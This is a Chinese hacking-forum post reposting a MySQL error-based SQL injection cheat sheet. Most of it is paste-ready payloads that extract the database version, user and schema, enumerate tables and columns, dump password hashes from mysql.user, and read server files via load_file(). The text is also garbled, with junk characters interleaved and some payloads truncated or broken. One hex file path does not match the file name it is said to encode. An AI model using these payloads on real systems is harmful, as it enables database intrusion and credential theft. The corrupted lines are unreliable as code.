Mysql暴错注入参考（pdf）

admin

本帖最后由 Nightmare 于 2013-3-17 14:20 编辑
8 `/ \+ G3 Z9 s! L9 p

Mysql暴错注入参考（pdf），每天一贴。。。
$ R0 O; i0 F7 g% C
8 X  I' |1 l, P/ M3 }6 h: \MySql Error Based Injection Reference
[Mysql暴错注入参考]
4 e' d4 ]) ^3 S4 ?  aAuthornig0s1992
/ P: B' X, O1 r# EBlog:http://pnig0s1992.blog.51cto.com/
5 I9 R( u( }. F% Q2 L3 L/ ~4 hTeAm:http://www.FreeBuf.com/
Mysql5.0.91下测试通过,对于5+的绝大部分版本可以测试成功
  k4 C$ B1 M/ X+ \小部分版本使用name_const()时会报错.可以用给出的Method.2测试
查询版本:
Method.1:and+exists(select*from+(select*from(select+name_const(@@version,0))a+
join+(select+name_const(@@version,0))b)c)
- w3 T+ K  I+ PMethod.2:and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+version()))a+from+information_schema.tables+gro
5 o7 v/ l; T$ ~! Oup by a)b)
查询当前用户:
Method.1:and+exists(select*from+(select*from(select+name_const(user(),0))a+join+(select+name_const(user(),0))b)c)
, c/ e# ]8 i# Q. A8 X( y# h7 xMethod.2:and+(select+1+from(select+count(*),concat((select+(select+user())+from+information_schema.tables+limit+0,1).floor(r
8 Y1 T, r- E4 ~6 v* d, z! \8 ^and(0)*2))x+from+information_schema.tables+group+by+x)a)
查询当前数据库:
- z. l6 K0 `3 j- Q. wMethod.1:and+exists(select*from+(select*from(select+name_const(database(),0))a+join+(select+name_const(database(),0))b)c)
Method.2:and+(select+1+from(select+count(*),concat((select+(select+database())+from+information_schema.tables+limit+0,1).flo
0 F% I+ I6 f- `: U+ aor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
3 M1 Q2 `# ^# @7 o2 H依次爆库and+exists(select*from+(select*from(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+
! s! V  ^% ]8 a+ U" @LIMIT+n,1),0))a+join+(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))b)c) 将n
2 t2 F! j: ~9 F4 |9 P; {9 g顺序替换
4 ?8 I3 D1 Z- p4 ~爆指定库数目:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(table_name)+FROM+`information_schema`.tables+WHERE+t
able_schema=0x6D7973716C))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group
) [% M) F% |8 A) |" P+by+x)a)+and+1=1 0x6D7973716C=mysql
依次爆表:
# P& M" H1 e3 K% s9 T: fand+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+table_name+FROM+information_schema.tables+Where+t
! }% u% C9 ?! L) sable_schema=0x6D7973716C+limit+n,1))+from+information_schema.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.ta
3 v% C: v+ L2 o# ^6 @$ `5 p1 pbles+group+by+x)a)+and+1=1
6 D2 n* C: V  E; Z7 D% L# _0x6D7973716C=Mysql 将n顺序替换
4 u( d3 u, a, _  r& P爆表内字段数目:
6 _9 ~6 a0 E  u' A- Pand+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(column_name)+FROM+`information_schema`.columns+WHERE
+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976))+from+information_schema.tables+limit+0,1),floor(ran
0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
1 }" p9 W# J+ @/ _1 e$ O依次爆字段:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+column_name+FROM+information_schema.columns+Where
7 x( A1 \1 H. I6 V6 K+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976+limit+n,1))+from+information_schema.tables+limit+0,1
loor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1  将n顺序替换
' R6 j' e; ]( R( Y依次暴内容:
: Z7 ^# k  X# J) ^- [7 P! Uand+(select+1+from(select+count(*),concat((select+(select+(select+password+from+mysql.user+limit+n,1))+from+information_sche
! P& Y, q" ?! V9 A& _* Q) h$ x: Zma.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
将n顺序替换
5 I  x# w  M8 J( d8 [: y爆文件内容:
3 ~6 u* M; w/ n9 s" T9 L9 l8 a( Yand+(SELECT+1+FROM+(select count(*),concat(floor(rand(0)*2),(SELECT+substring(load_file(0x433A5C5C746573742E617361),1,64)))a
from+information_schema.tables+group+by+a)b)
' {' R3 U! y, W+ x+ W0x433A5C5C626F6F742E696E69=C:\\boot.ini 因为只能爆出64字节的内容,需要用Substring()控制显示的字节
' G7 _8 ]0 P: a- X4 ]$ u" MThx for reading.

9 o) |$ k- A4 @不要下载也可以，